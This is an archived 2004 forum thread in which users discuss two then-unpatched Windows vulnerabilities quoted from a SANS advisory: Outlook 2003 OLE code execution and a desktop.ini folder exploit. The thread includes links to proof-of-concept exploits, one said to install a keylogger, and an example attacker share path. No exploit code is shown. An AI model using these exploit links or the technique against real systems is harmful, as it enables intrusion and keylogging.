PDA

View Full Version : New Windows vulnerabilities


Westside guy
May 24, 2004, 10:52 AM
Hi there,

Not sure how to post this without starting a flame war. :D But (mainly for the "Windows is only vulnerable due to non-patched machines" crowd) I thought it was worth mentioning two recently announced vulnerabilities hot off the SANS newswire. They're the first not-already-patched exploits I've seen in several weeks, but it's not an uncommon problem.

Out of fairness I'll also point out the same issue listed the OS X "Help Protocol" exploit, which was patched last Friday.

#1 HIGH: Microsoft Outlook Arbitrary Code Execution
Affected: Outlook 2003

Description: The default security setting of Outlook 2003 ("Restricted Zone") does not allow execution of Active-X controls and arbitrary scripts. However, it is reported that an email containing an embedded OLE object such as a Windows media player, can bypass these security checks. By exploiting this flaw in conjunction with the Outlook's flaw of storing files specified in "img" tags at a predictable location, it may be possible to silently execute arbitrary code on the client system. The code would execute with the privileges of the logged-on user. A proof-of-concept exploit has been posted.

Status: Microsoft has not confirmed, no updates available.

References:
Postings by http-equiv
http://archives.neohapsis.com/archives/ntbugtraq/2004-q2/0058.html
http://archives.neohapsis.com/archives/ntbugtraq/2004-q2/0056.html
Proof-of-Concept Exploit
http://www.malware.com/rockIT.zip
OLE Concepts
http://support.microsoft.com/support/kb/articles/Q86/0/08.asp&NoWebContent=1
SecurityFocus BIDs
http://www.securityfocus.com/bid/10369
http://www.securityfocus.com/bid/10307

#2 MODERATE: Windows Folder Arbitrary Code Execution
Affected: Windows XP/2000

Description: The "desktop.ini", a hidden file when present in a Windows folder, instructs Windows Explorer how to display the folder's contents. A problem arises when the ".ShellClassInfo" section in a folder's desktop.ini file points to an executable program. This can be exploited to execute arbitrary code on a client system when an unsuspecting user opens such a specially crafted folder. To exploit the flaw, an attacker would have to create the malicious "shared" folder and entice a victim to open it. The attacker can include the folder's URI for e.g. \\attacker-ip\bad-folder, in a webpage or email it to a potential victim. Proof-of-Concept exploit that installs a keylogger on the client system has been publicly posted.

Status: Microsoft has not confirmed, no patches available. Block the ports 139/tcp and 445/tcp at the network perimeter to prevent attacks from the Internet.

References:
Posting by Roozbeh Afrasiabi
http://www.securityfocus.com/archive/1/363590/2004-05-17/2004-05-23/0
Proof-of-Concept Exploit
http://www.freewebs.com/roozbeh_afrasiabi/xploit/execute.htm
Desktop.ini File Details
http://msdn.microsoft.com/library/en-us/shellcc/platform/shell/programmersguide/shell_basics/shell_basics_extending/custom.asp
SecurityFocus BID
http://www.securityfocus.com/bid/10363

robbieduncan
May 24, 2004, 11:00 AM
Whilst unsurprising that there are undiscovered flaws in MS programs the first is not a Windows flaw. It's an Outlook 2003 flaw. There are many Windows machines without Outlook 2003.

johnnyjibbs
May 24, 2004, 11:11 AM
How many security flaws aren't to do with Outlook, Outlook Express or IE? :D :D

wrldwzrd89
May 24, 2004, 11:12 AM
Whilst unsurprising that there are undiscovered flaws in MS programs the first is not a Windows flaw. It's an Outlook 2003 flaw. There are many Windows machines without Outlook 2003.
Although the first flaw is technically an Outlook 2003 flaw rather than one in Windows itself, it still qualifies as a Windows flaw since Outlook 2003 is not available for platforms other than Windows. Both flaws are also Microsoft flaws, regardless of which program(s) they affect. I'm glad I don't use Windows (at home)!

tomf87
May 24, 2004, 11:18 AM
Although the first flaw is technically an Outlook 2003 flaw rather than one in Windows itself, it still qualifies as a Windows flaw since Outlook 2003 is not available for platforms other than Windows. Both flaws are also Microsoft flaws, regardless of which program(s) they affect. I'm glad I don't use Windows (at home)!

This doesn't make any sense whatsoever. So, if Apple's Final Cut Pro application has a flaw, then it is an OS X flaw as well? That doesn't make sense. While they do have the same manufacturer, one is an application and the other is an operating system.

wrldwzrd89
May 24, 2004, 11:19 AM
This doesn't make any sense whatsoever. So, if Apple's Final Cut Pro application has a flaw, then it is an OS X flaw as well? That doesn't make sense. While they do have the same manufacturer, one is an application and the other is an operating system.
I was just trying to explain what I thought the original poster's logic was...I guess I failed (either that, or I succeeded, but the logic was wrong anyway).

tomf87
May 24, 2004, 11:21 AM
I was just trying to explain what I thought the original poster's logic was...I guess I failed (either that, or I succeeded, but the logic was wrong anyway).

Either way, it doesn't matter. My mind is computing data well today anyway, so I could be wrong as well. :)

edesignuk
May 24, 2004, 11:23 AM
How many security flaws aren't to do with Outlook, Outlook Express or IE? :D :D
Don't forget IIS! That's a biggie! :eek:

wrldwzrd89
May 24, 2004, 11:27 AM
Don't forget IIS! That's a biggie! :eek:
IMO, Microsoft's IIS has as many security holes as 2,000 slices of Swiss cheese (which is FAR too many).

mkrishnan
May 24, 2004, 11:54 AM
Description: The "desktop.ini", a hidden file when present in a Windows folder, instructs Windows Explorer how to display the folder's contents. A problem arises when the ".ShellClassInfo" section in a folder's desktop.ini file points to an executable program.

Hmmm...if I understand this correctly, this could potentially be pasted into any zip'd file (install file, etc) containing folders, and would then act when the folders were opened by a user with active desktop enabled, right? If that's so, I'm surprised its floated around for so long. :( Of course, maybe that's cuz everyone's turning off active desktop and going classic as soon as they get their Win PC's.... :D

Westside guy
May 24, 2004, 01:14 PM
I was just trying to explain what I thought the original poster's logic was...I guess I failed (either that, or I succeeded, but the logic was wrong anyway).

This poster's original logic was thus: While this is indeed a flaw in Outlook, because of the way Windows is constructed many "Outlook flaws" end up actually residing in Internet Explorer's code base (don't know about this one). As such, they are often part of the actual operating system code rather than stand-alone. That's why some recent "Outlook flaws" were exploitable whether or not Outlook was actually running.

Also, there are lots of cross-dependencies on Windows. I know on our home XP box we cannot (at least according to XP) uninstall Outlook without breaking some other programs' functionality - even though we don't use Outlook.

Mav451
May 24, 2004, 01:29 PM
Hmmm...if I understand this correctly, this could potentially be pasted into any zip'd file (install file, etc) containing folders, and would then act when the folders were opened by a user with active desktop enabled, right? If that's so, I'm surprised its floated around for so long. :( Of course, maybe that's cuz everyone's turning off active desktop and going classic as soon as they get their Win PC's.... :D

Haha, I haven't heard the term "active desktop" since 1999...talk about a trip through time.

wrldwzrd89
May 24, 2004, 02:04 PM
Hmmm...if I understand this correctly, this could potentially be pasted into any zip'd file (install file, etc) containing folders, and would then act when the folders were opened by a user with active desktop enabled, right? If that's so, I'm surprised its floated around for so long. :( Of course, maybe that's cuz everyone's turning off active desktop and going classic as soon as they get their Win PC's.... :D
My understanding is that this particular flaw can be exploited regardless of Active Desktop settings. The only thing I think it might depend on is that "Use Web-style folders" for Explorer is enabled (I don't know if the desktop.ini and folder.htt files are used when Web folders are disabled).

mkrishnan
May 25, 2004, 09:45 AM
My understanding is that this particular flaw can be exploited regardless of Active Desktop settings. The only thing I think it might depend on is that "Use Web-style folders" for Explorer is enabled (I don't know if the desktop.ini and folder.htt files are used when Web folders are disabled).

Oh, sorry. LOL this is what I was thinking of when I said active desktop. :o I guess they don't call it that anymore. I haven't used XP all that much. But yeah, I really hate web-style folders and I always turn them off.

But still, my point, hasn't this flaw basically existed as long as web-style folders, i.e. a REALLY long time?

wrldwzrd89
May 25, 2004, 10:12 AM
Oh, sorry. LOL this is what I was thinking of when I said active desktop. :o I guess they don't call it that anymore. I haven't used XP all that much. But yeah, I really hate web-style folders and I always turn them off.

But still, my point, hasn't this flaw basically existed as long as web-style folders, i.e. a REALLY long time?
You're probably right - odds are good that ever since Windows started using Web-style folders (can't remember if this was in Win95 first or Win98), this particular flaw has been present.

SiliconAddict
May 25, 2004, 02:40 PM
You're probably right - odds are good that ever since Windows started using Web-style folders (can't remember if this was in Win95 first or Win98), this particular flaw has been present.


Win98 started it and it is the most annoying thing on the planet. I can't tell you how many damn times I've had the wonderful error message of "Can not delete file. File is in use" or something along those lines simply because MS is previewing the damn thing in the web portion of the file browser. I ALWAYS turn this feature off for several reasons the biggest being that it slows down the browsing process. When I'm powering through a folder structure to move files I don't need a damn cute web interface to get in the way. Actually the coolest most innovative design MS did was the address bar in the file browser. I can power through a path with the auto filling options. Screw point and click. The way MS did it was a hybrid of the two methods.

Beyond that #1 doesn't affect me since my mail server bounces back any HTML mail to the sender with a nice message. "Please send any e-mails to Jonathan in non-HTML format. Thanks." I neither care for nor need HTML mail. Give me RTF text. That's good enough for me and it guarantees that a scrip isn't going to be embedded into my email that will decimate my computer.

mkrishnan
May 26, 2004, 06:54 AM
Actually the coolest most innovative design MS did was the address bar in the file browser. I can power through a path with the auto filling options. Screw point and click. The way MS did it was a hybrid of the two methods.

Yeah, I love this feature too -- especially with autocomplete. I use it like crazy. When the whole active desktop / MSIE integration issue was floating around, I was worried that they would remove this in order to comply with the ruling! :( So I was glad they didn't....